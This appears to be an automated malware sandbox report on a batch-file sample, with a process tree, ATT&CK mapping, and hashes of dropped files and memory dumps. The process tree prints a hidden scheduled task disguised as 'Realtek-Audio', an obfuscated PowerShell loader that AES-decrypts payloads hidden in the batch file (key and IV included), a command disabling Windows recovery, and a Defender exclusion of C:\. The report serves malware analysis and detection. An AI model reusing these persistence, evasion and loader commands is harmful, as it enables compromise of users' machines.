      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\ygv1xm4ww5r1.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4052
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Realtek-Hub\ygv1xm4ww5r1.vbs"
      4⤵
      Checks computer location settings
      PID:5404
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Realtek-Hub\ygv1xm4ww5r1.bat" "
        5⤵
        
        PID:5476
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Realtek-Hub\ygv1xm4ww5r1.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5524
        
        C:\Windows\system32\reagentc.exe
        
        "reagentc.exe" /disable
        7⤵
        Drops file in Windows directory
        
        PID:5648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
0dd85016e815092f580e79b862a80481

SHA1
72aa1201ae1b2810d3aceda5bb075a128926d3b8

SHA256
cb135185d6d3e7602772ccf36c138b2219c0813e98a9109f1ada453415e6f189

SHA512
8b0ef72f46cfc735e3d87bfa52bda85ac3c18e1c195bbd8eb2a8dcd4940bfef70a7b06af9351b8565e907c8338ccaeaed9ea805cd1f41d0abfb7413cb75b620b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
fe799790ac805426c16111fdd958691f

SHA1
de00c6c121a77e3a4fe5ca3ed4c3c8ba848c1e44

SHA256
18c29038f1f00a305e05d29d273c14d1523e320f4aecbd55cf8f88df721efea1

SHA512
27bd3980a3ddc4a164077431b1004f86fbad7bfb4730de70316b28e27d5ee4ac83fdf0c4f7c87580b0bb69e7c51b6297699e5f6963c0b5e64af475b73b75305b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
743ab0d8df3e176c1216deda3fb9438b

SHA1
901e97b5d2b8cddafddded58c857a2186f61db70

SHA256
4f9e93e738802c4a9d871cd85d07fea622a283dad55eda742c9152dff3a19d6d

SHA512
04142dde1a14e2031fd198210844782c7c2ee7d03326423bdc6691de17d58ae00a3bc324ffc62562c4deabf031f10ca7bbb7ca2c48f5eeed5f364bf4796cb738

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1f0a7cd8cb891bd56a9df6bcc8c2f866

SHA1
f33094d61ea18fff70041a2b5423865e8b65a3e6

SHA256
a0f6272778c92411eb6a98d1b743f798525c300d469799ce0198b750d4942112

SHA512
3bea5afbdc109049e87a57286a9c54feef4fa6087bb68f08a02da88b5ce62f025ba083dcba529446c8dfeb2f2ff88dde2cf653bcaa846055b0d00616dc9f5b39

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ab67eec3ca7af2ae792a42efe8c55fac

SHA1
d666f9602ed20d4bf42429be743c8e391503e71f

SHA256
9941c9843a3001c1d27c21dba1c637bf2a2425a66ccde6a92270bede06325f6d

SHA512
1b657e7398626b4028142af48f416423ec1c95ba8d89a4434d46687fa8564f248fdcb7e265460ffd7a230cb748b01ebe26f010287cd6f19a1250dfde7685240e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
de9dd6de8b861d362e8697ded762d148

SHA1
69437b473c041a7bf72940f1357bfb138836d14c

SHA256
e4b10afe323a5b12ff971b97cdc77623126ebf240b21285c2718efd9f6aa9b75

SHA512
f35c694be21718f4d0209b2f6fcfd582cd67f1f4d3b20fd0e8b9c2eba11c6e842e4b35c7f76cd4f87a33e4ef5bf6e96846a84e18405b7cfd9048c699b9846c4a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1cd7b8082a3d3f6879ef13808cd62bf6

SHA1
6bd9157e2f10f778194988b82e3d04b89e69e9a6

SHA256
3fe43b375280afb17403800d6153904a9df5827280adada1ca51ebecab5a1bc9

SHA512
08d042be8426a419f1cba7959eec6f1b0ce91a86af0ead836def5363bd0de8e8a2aca767b176eb1dc3b27a57f2031b53222758f26d713341a4fb340a0296993f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
499a808fc718d84b8446f53dd204cb59

SHA1
a60fdcfb031647c30f8d3867270fe93e3224a57e

SHA256
a4481401caa19b8197463f5e78c8d36e57ec7baa22b57ca4f845204b6ac1280f

SHA512
9dc564fa0f59a87ec69332aa6698582594bde1dc3ec989a482b2d10374f4eb37b5b5e17b9225d66bb5994dfa49fa274b1fb3247f94ce0239de18849c829647e7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e2979923cad0c4cf89b8633ad5fd6252

SHA1
d14c5b34fce3812a998ff3a666a4179f51c22231

SHA256
ee2fd6c6d5fcc1806d2034355e93a5f8a7553d6b6505b71b1149b2ae77c4a3b6

SHA512
14aa052e4c623ddbc4a0d212f3738383838e13a776d8c345e0f1fa29345daec6d302293ff56c924eacb015a48be3937c904b11b382375494e6d2238b7850fc4c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
827bbf1e8d9dfbff2e655e1e79dd9a4c

SHA1
b4a1a486d87216f728967eacd006e4ce4735c4a4

SHA256
b8006641542e593143b865d1fff61a46974624fc13f52a60e0fac57edfbbe054

SHA512
264834e8a5c293c25e9549651e0d7e20672fe0530b7889ae7a3b808c30594e6d1faac054a9a2d2e9ef803115fb87af89fbbd09009fa3808fda4d090c3b51c1a9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
fceb7c2155959e9a87505eb41d214841

SHA1
ab8b9f648443c1f42e7f1ed15d522eeefe12da75

SHA256
b6b73f0fb1738935cb43736324f81e8038eff78b260f9428f4002ca7ea2ab6c0

SHA512
87fd0bcba81ee887135652d3570f615fd0c6254f7c4fcce538afe2233ec2022bec7e19b97df2b35f2372127f41a882343764410b1d8a423371da99b9823b745e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e340df9ede8857eb3a2843ea7d5ab158

SHA1
6914be6b34348b8a374c30e54a9794d18ad14269

SHA256
5f703f3f64f8d19a1c6c570c2f08cec3cec49778829a5c95a6165ef8b0d1a7f5

SHA512
f40e43c4d10ab699b089cbb2ffb8bb8b82204ed66f0436718b6103b1c4dfa2b3e33555ddf72238c1808641cb07adfe793fe3c894846bb362db61a5304721f34a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
59bce1642881e9b73cfffa702fefe669

SHA1
1131dce575e43e7a213ad158c7d4e41fbcc9e96e

SHA256
2095589c62e2e4f73c09d4ab15b13939c50a46bb5568051e340e39d6bfdfe8c2

SHA512
7fb2cfba1642ba0528cf7cf4cd289a884281013cc415adec017b55af8cb1d6da81c47a9d3df36a7a8a2e98edec9c3d05b5280c1b3ce523d4c9c95f6dbc4b16a6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
be1ad8ea28faf0783a79023c2990ed61

SHA1
7325755bc88b48526ed195960bbc21fcef0c5f67

SHA256
c387931767758589eb994ee2df4ddc7b91a12d494501e1f6f5f5a3eece88b480

SHA512
0b9037e2149459450d14398f9bb0258a9e0dda96a9ec9bc5d6c0fb5818df04909cf47536c3ee7abb8ecb483b1165e3a2d7ffa74a09529ab46cbe9ff3ac3cb993

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
d14c6343ceda9ca1c50394005958ec3e

SHA1
1ca4635f99ad5db9c209f2ee5b231fc79ce0ab13

SHA256
2b7e40a691101cad5948e485f0a465d9dc80ef51b81994fb7acee29920fafccb

SHA512
616d7689f585bc4d937601c718a765a9547e947cd0d8ff21c5c9cf1a7b83e77318eda5cdff3ef3636052b15c730ea1333564062253b6fc6cc15168f501d56316

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
4999c09e5063573a6ad43f66ce978d99

SHA1
163b41da6aa6cf7f8110f7a3d52f6fc73b8341c1

SHA256
3c00ebb9212135d54bc0211460583db6ae09e74d1560e322bcba6c6aa24caa41

SHA512
ced19bad19d230e46ab82fe7442642ad5c80fcbd6102a9cedc38b2da51a81e6d0aa3374bbab81f589c4cdbee415e77f8e9e0af2e271c348fb0d8799205ac383d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
6fca40a37fa2d7b74dbb5973062f4826

SHA1
ddb6856639aa100f07cf2bcada25ff82810d41f4

SHA256
0ea88ce0710bcd8989954c873cfcb7e58b042dffced26e4f0c99131bd0245130

SHA512
b61be5e3bbe7c2fde43c8f8866bac5a582f26db28edf1043c7402c18c76c3be531e80453ae712a86e6a859746685edcdf5a971ab77cb623e64b36586c314ab15

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
2f33fdf6fc3ace6f3a9045a1070695d1

SHA1
e002deb0a597bb3a7a13a5ed6867cc2fbe45211d

SHA256
bf91399699ecdff3b288be0118bddc1cc849aa59b23b5e25fa64b9474aa2cdf7

SHA512
fc0cc83c21482c1a857f01a8f8ae755f3653b370ef31f285ef0c4618f78c72b3c3013e70efeebc76a2ad03c1334f74316b557f21b6c9f3174a29d04fdc5db9e7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
ab3a138e7b8a86a3f17e005a354d41b7

SHA1
d31e44f0e30c2a5723b323f21d66c95b7b5bb05c

SHA256
510122b1d4259715d436f77962d35e5255f48a9087932a5c9530ad5ce29ac686

SHA512
3ae6737bb0f11ed5498b5aeeaa9ff5d894bda4f631caa01fd3c1031737eaf9140178c3dbc132275b2231d93e275ab4fa244a5956286d97a71d4af112e0c4bd7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60b3262c3163ee3d466199160b9ed07d

SHA1
994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

SHA256
e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

SHA512
081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0eeef2beb0894c79a0c5d1cd01642a31

SHA1
567780ddf73c62bf414b812e0b960e70b07272ba

SHA256
8acc894fd669afe5df0c047a9851376d7309fcc571b5346a267792b27d99fbda

SHA512
7196540d9ba48c76f8a8bb6d9bdad92fe40a84e70222610efafb9492d7ded1985926a49bab7b168de563da3e442a682e78adefd055e436ccac530371823b1c17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a807b1c91ac66f33f88a787d64904c1

SHA1
83c554c7de04a8115c9005709e5cd01fca82c5d3

SHA256
155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256

SHA512
29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
836B

MD5
87b0b32d21f45c7331970bfce07dea23

SHA1
e3ac32ca2cc95e4adacdf46b7a09598c095801d9

SHA256
36eb1b3ed410aa31a4235823d4f14fe9cb088a4cee763c5e87566ed16996400e

SHA512
305199812177486d9bff3029cf8ce6912cffbb77ef6a7fddf1078a6c5d36f2b90a9e097d767e7b21e497b049abf46a2474fc8b83702787d13867dba67bc93b10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
874839716b8e475efbb5159e742772e6

SHA1
4baf54fefaa2c2550729ca13206bbcc9a621346d

SHA256
6e0bac5cbd38ba92c9ac68b8beb356a926dde0b04d96533830dc88b313d51212

SHA512
7822c4ded78ab694a9406d1c3f8350cb75b334fbf428c5f858440d9f572c23725e7cf0bda1c696cb53376f13fc79ce0c18895c265623782de46a5960ca1e3259

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d2bdcbd1da294a4499fb6b96d0b7dbb8

SHA1
a72842995f20aceac1a4da2a18afb8fe93041f3e

SHA256
b76e03d850df6cb1f692dab6d40a985542cb718b035d6647fdad3c59bf975e92

SHA512
df08c33093bec81939291ec87457b655ea52a68ac3f7b42dc9d015b46c43f0243772712b21fe5f0821104cef296757aec1900721d0f5d6f4d2123dd473bc152e

Download Submit
C:\Users\Admin\AppData\Local\Realtek-Hub\0dwthqxv3jj6.vbs

Filesize
149B

MD5
bbe02c9fee5bade92b7ff74167c5e173

SHA1
9cfa7e206e4119f3f4885b31c565be8166fc1c6a

SHA256
f91a537fb670a8a14e81138658beaa43fb8157c39fc6069d3ce888a59b423c1c

SHA512
ba119c8bdceba514ca2b609dd796c8d17196f92de6470d7e76dd34b6ed14f326ed608a1c757e7ff2adab492218b686e4cc6e0efd79b865bea1bccbf68af679aa

Download Submit
C:\Users\Admin\AppData\Local\Realtek-Hub\ygv1xm4ww5r1.vbs

Filesize
149B

MD5
d85310c983a4d45a56ba89c896697022

SHA1
994d1436d6fc948a53c04cd62668192dfd7d292a

SHA256
8bcd1317a75f2ca0a81e3037c1e0e9eb49b33c66531a99cc1688b4e6d2685ebd

SHA512
a5e8b3b9f8d509a0ede5e75fbc8f55772730548b9a011f6b8b0a83c2a7cc8ee135b49d91d50dcc3867d833e8df91fabd24e8b49dbf4cff73fa9a55165ea603ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eohjjzkl.ht0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Zflare.bat

Filesize
115KB

MD5
a291659c73e487039ba0d4ed584d2335

SHA1
10b534a148cd151d32bf41fb8674acd5bc98493e

SHA256
3c482d9f9ba4f4a1ab37d3a0016763eaef87f5e51e259ee92d11e619026531c3

SHA512
797c0ab0dc2cf5a5f9012f1426f7766ff7ccf83c287b840254fb7b453d3a79b8cb6d59228cf6ec382cfc4ac6b069714f391efd57008b481a6d247f7da6d09c35

Download Submit
C:\Windows\Logs\ReAgent\ReAgent.log

Filesize
2KB

MD5
ffd7034dd1d823606627af1edaa84034

SHA1
07461cd0317908c53dbece505b1909457709bea2

SHA256
c51ffe077c9ff53dcd409caa7e5394460fdfde8fa006226c0d0cbbc83efab635

SHA512
7cf9211523670e16aaa2b344939d061e2434d8cb9591e671dbf983e92cfc5b88663f92602b2c42d28eb4aa6d7e1166d932a8e54535caa428ab2144172d61f792

Download Submit
C:\Windows\Logs\ReAgent\ReAgent.log

Filesize
3KB

MD5
3b0510086f69603cae39a081ffecca5f

SHA1
c8ec8b09387499bbe65b1654efc4313fe566f72a

SHA256
1556eae10f87f67b7dae0bc1b6baaaa6e5738dcb360b8f97b54c5ae767a4a5b4

SHA512
3ba247b4fb90643a05af05c58883e615faca422ed58fa6bd4c47ba1c9ef8056c694ba2585f6e51d029148b9349b09a036d7443655b0cc7dfc054e34b317c7941

Download Submit
C:\Windows\Logs\ReAgent\ReAgent.log

Filesize
7KB

MD5
1daa3863388a3a5df16b0dfef8655eeb

SHA1
eb601e77c6115ecf336f0759685a2985dc339b4d

SHA256
e1b31373beee069b660a507cb91841bb40076fccf6447f41e3f5cb4c3abb6454

SHA512
20a613e11c254d2dd75faf01e3760da374fcf692a027ecc87ff49fb141aeffc02da310adfa98501e41069524abca192d4c00d0c06c82e08d93a2606c1edc36f0

Download Submit
C:\Windows\Panther\UnattendGC\diagerr.xml

Filesize
9KB

MD5
729e686fbe4867f94d01de888299730d

SHA1
3a52c8ce0de8b344637ef3d9ae2e42727d8c879e

SHA256
a956e08a12bb657248b11bd5734a32c5a0bc2832b422d42e4b8644a28303e194

SHA512
0ae494ecd2f4bd8ba2828887b06c285fac4cfdfe7e3db23080e67575e94a3d49e718b600cdadce2e7a0272361c0eae1dcc60eef7ad685d39d479f7dc53bccba7

Download Submit
C:\Windows\Panther\UnattendGC\diagerr.xml

Filesize
13KB

MD5
36ccc1c38850bb6c781f43c4a4d0fb16

SHA1
5b61b61c0da5d275fe9cbb9a9093a57bbadfd80c

SHA256
26ba20fac8933cb5ae4699a5c52ca64e1646f81de7a56bf6904702ec126d7361

SHA512
76c90d385cd50f1603b2c99e51d2ebd205321e1ffd216c7ed5177305eac8c7915ecab92c3d22cc1814eb4f2b3ea3083e9011811a9ecffbd6e1f7b0edcdc03d5b

Download Submit
C:\Windows\Panther\UnattendGC\diagerr.xml

Filesize
15KB

MD5
9f18393a7ef8b0da3097f1e625e5d4fa

SHA1
da4bb85ba302e890c855d8d3b3c6c37bf8f82d1f

SHA256
5af151f3a3da240263671d2d561aa1b3908651e16f4f29a8870eea30d6ca3bbb

SHA512
d873c82cba9ff1215e09e13a0d97042051cfa51ab3e8db861a8e2645f65b2e6d336f9d8742a63d1ff84a127fe9ad18bc3073647d478a498c0505d60be6bbb50c

Download Submit
C:\Windows\Panther\UnattendGC\diagwrn.xml

Filesize
10KB

MD5
d70935dac520c8fca4b408bfc587fdb8

SHA1
577ca8da5daf711bb66f7d5d7f7e5469f152a7da

SHA256
735a676304ec76017c2869a10c1ef068da24ff31a771242bf85ce0ac2c748b23

SHA512
f4f85e95f89c64c65b283c15f2231a26478e560468a3b7188db4202ed721585b4720857ad16fb4717e121002ee47bf7cfbad694b05e67590e56fcf85b418f206

Download Submit
C:\Windows\Panther\UnattendGC\diagwrn.xml

Filesize
15KB

MD5
3f73637ad49b71d231c7284ef4d5dedd

SHA1
65cd1c00dd36cee6c3c8b66a55b678afe281c2af

SHA256
2ec0a348d6eb47bb62bf67ea690be0edae513c75815b02c0b237ccb3ac728e0e

SHA512
325f7006bf44a2436e0895b8f7a8fe2ec9e615694914378c8abf5d3724e39feeea4053e8a16065178c4151bdff209fc1a9652b48bcace0b224789cbbf40dccbd

Download Submit
C:\Windows\Panther\UnattendGC\diagwrn.xml

Filesize
17KB

MD5
286169b62fae13da86fe8501f2dfa0ff

SHA1
336309a48cb9646cdce5e8351e8ec47dfa242e56

SHA256
54e1b325a60f440102ef6caa7f17ba1ec5ca2d5cdbb67533fad5ec292bde5a09

SHA512
f6fd9238707ff3d7e3010c4e68b41648be9cbec4946d52f054c01011a07258959aa44a0b4f31b3d456ae37a73156f2132a59659d6026bef8da9360537b6b5a74

Download Submit
C:\Windows\Panther\UnattendGC\setuperr.log

Filesize
98B

MD5
d76d5bb6720e5c2c326c2eb94e47e157

SHA1
c190b20be1d6aa785feda07f077a88436762182b

SHA256
4e84d63176ac8f8e958c05f9a5a3bfcc1e1dbaa63bf50f924be68aa2638ab1e0

SHA512
c20a6142e405c757ff0c918a5eb521331e73555e80f64c6391fdf3f89a15751b554aab6ab76a53ab5d03eaf5564d47424e46506130688ba36448f215a67dfa2f

Download Submit
C:\Windows\Panther\UnattendGC\setuperr.log

Filesize
288B

MD5
b344aa2b7f69e919b6f3d1278c9deabf

SHA1
1a48099c9f9ab8ba00bce0fd83eb4a5bb711bb14

SHA256
36aa23022205a5b4f9b75bbebccc8f47a0975c6f153eed8ef6608dba550b6607

SHA512
c290dd93be0d845ae4bc1f3397a758e3ec1c07adb9ff9f503f8652a87e113abb5f0cb2f201b9038bb04ac73ddcdaf0a20326619a15b87a260088dfa453411ea0

Download Submit
C:\Windows\system32\Recovery\ReAgent.xml

Filesize
1KB

MD5
44b2da39ceb2c183d5dcd43aa128c2dd

SHA1
502723d48caf7bb6e50867685378b28e84999d8a

SHA256
894ee2b19608d10df4bf8b8f5bbcf40ce38c09c1f4c5543b6164f40c04bb270d

SHA512
17744dcaddb49f17fe67dc3a579f4df2b6c2b196776330b71edfc58b37d1f8ae477bfb718d2f23401b78b789b7f984b19341f50fbecfba1bc101f596dee40604

Download Submit
memory/1352-109-0x00007FF954200000-0x00007FF954CC2000-memory.dmp

Filesize
10.8MB

Download
memory/1352-188-0x00007FF954200000-0x00007FF954CC2000-memory.dmp

Filesize
10.8MB

Download
memory/1352-112-0x000001BB6F090000-0x000001BB6F0A2000-memory.dmp

Filesize
72KB

Download
memory/1352-111-0x000001BB6F080000-0x000001BB6F088000-memory.dmp

Filesize
32KB

Download
memory/1352-110-0x00007FF954200000-0x00007FF954CC2000-memory.dmp

Filesize
10.8MB

Download
memory/1352-104-0x000001BB6F2D0000-0x000001BB6F2F2000-memory.dmp

Filesize
136KB

Download
memory/1352-98-0x00007FF954203000-0x00007FF954205000-memory.dmp

Filesize
8KB

Download
memory/3720-168-0x000002D7C9290000-0x000002D7C92A0000-memory.dmp

Filesize
64KB

Download
memory/3720-159-0x000002D7C9260000-0x000002D7C9272000-memory.dmp

Filesize
72KB

Download
memory/3720-353-0x000002D7C8F00000-0x000002D7C8F0C000-memory.dmp

Filesize
48KB

Download
memory/4292-210-0x0000023829300000-0x0000023829312000-memory.dmp

Filesize
72KB

Download
memory/5524-259-0x0000022B758C0000-0x0000022B758D2000-memory.dmp

Filesize
72KB

Download